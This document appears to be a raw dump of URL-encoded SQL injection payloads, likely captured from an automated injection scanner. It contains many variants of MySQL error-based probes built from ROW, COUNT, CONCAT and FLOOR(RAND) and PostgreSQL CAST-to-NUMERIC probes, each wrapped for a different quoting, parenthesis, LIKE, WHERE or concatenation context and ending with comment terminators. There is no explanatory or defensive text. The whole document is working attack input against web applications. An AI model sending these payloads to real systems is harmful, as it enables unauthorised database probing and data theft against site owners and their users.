1%22%29%29%29%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20AND%20%28%28%28%22LrlF%22%3D%22LrlF 1%22%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20AND%20%22PcVT%22%3D%22PcVT 1%22%29%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20AND%20%28%22gdkp%22%20LIKE%20%22gdkp 1%22%29%29%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20AND%20%28%28%22gWHy%22%20LIKE%20%22gWHy 1%22%29%29%29%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20AND%20%28%28%28%22SFmc%22%20LIKE%20%22SFmc 1%22%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20AND%20%22ikpy%22%20LIKE%20%22ikpy 1%25%27%29%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20AND%20%28%27%25%27%3D%27 1%25%27%29%29%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20AND%20%28%28%27%25%27%3D%27 1%25%27%29%29%29%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20AND%20%28%28%28%27%25%27%3D%27 1%25%27%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20AND%20%27%25%27%3D%27 1%00%27%29%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20AND%20%28%27gkOu%27%3D%27gkOu 1%00%27%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20AND%20%27StZP%27%3D%27StZP 1%27%29%20WHERE%207816%3D7816%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20--%20 1%22%29%20WHERE%208007%3D8007%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20--%20 1%27%20WHERE%209776%3D9776%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20--%20 1%22%20WHERE%205445%3D5445%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20--%20 1%27%7C%7C%28SELECT%20%27VjaM%27%20FROM%20DUAL%20WHERE%202093%3D2093%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20%29%7C%7C%27 1%27%7C%7C%28SELECT%20%27SazK%27%20WHERE%204847%3D4847%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20%29%7C%7C%27 1%27%2B%28SELECT%20nugn%20WHERE%203819%3D3819%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20%29%2B%27 1%27%2B%28SELECT%20%27zaGZ%27%20WHERE%207280%3D7280%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20%29%2B%27 1%27%20IN%20BOOLEAN%20MODE%29%20AND%20ROW%283874%2C3134%29%3E%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6e736b3a%2C%28SELECT%20%28CASE%20WHEN%20%283874%3D3874%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a6270793a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20%28SELECT%207691%20UNION%20SELECT%203346%20UNION%20SELECT%209383%20UNION%20SELECT%207096%29a%20GROUP%20BY%20x%29%20%23 1%29%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29 1%29%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%287271%3D7271 1%29%29%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%281331%3D1331 1%29%29%29%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%287280%3D7280 1%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29 1%29%20WHERE%206034%3D6034%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 1%20WHERE%205061%3D5061%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 1%27%29%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29 1%27%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29 1%22%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29 1%27%29%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%27evVa%27%3D%27evVa 1%27%29%29%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%27ouCU%27%3D%27ouCU 1%27%29%29%29%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%28%27wiGm%27%3D%27wiGm 1%27%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%27zIUN%27%3D%27zIUN 1%27%29%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%27IFSQ%27%20LIKE%20%27IFSQ 1%27%29%29%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%27stAu%27%20LIKE%20%27stAu 1%27%29%29%29%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%28%27XZRf%27%20LIKE%20%27XZRf 1%27%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%27hydg%27%20LIKE%20%27hydg 1%22%29%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%22EPrp%22%3D%22EPrp 1%22%29%29%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%22SnDE%22%3D%22SnDE 1%22%29%29%29%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%28%22fawI%22%3D%22fawI 1%22%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%22Clui%22%3D%22Clui 1%22%29%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%22CSZi%22%20LIKE%20%22CSZi 1%22%29%29%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%22jhAe%22%20LIKE%20%22jhAe 1%22%29%29%29%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%28%22MCLk%22%20LIKE%20%22MCLk 1%22%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%22itec%22%20LIKE%20%22itec 1%25%27%29%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%27%25%27%3D%27 1%25%27%29%29%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%27%25%27%3D%27 1%25%27%29%29%29%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%28%28%27%25%27%3D%27 1%25%27%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%27%25%27%3D%27 1%00%27%29%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%28%27olTE%27%3D%27olTE 1%00%27%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20AND%20%27qusx%27%3D%27qusx 1%27%29%20WHERE%208123%3D8123%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 1%22%29%20WHERE%206856%3D6856%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 1%27%20WHERE%204280%3D4280%20AND%208307%3DCAST%28%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%288307%3D8307%29%20THEN%201%20ELSE%200%20END%29%29%3A%3Atext%7C%7C%28CHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AS%20NUMERIC%29%20--%20 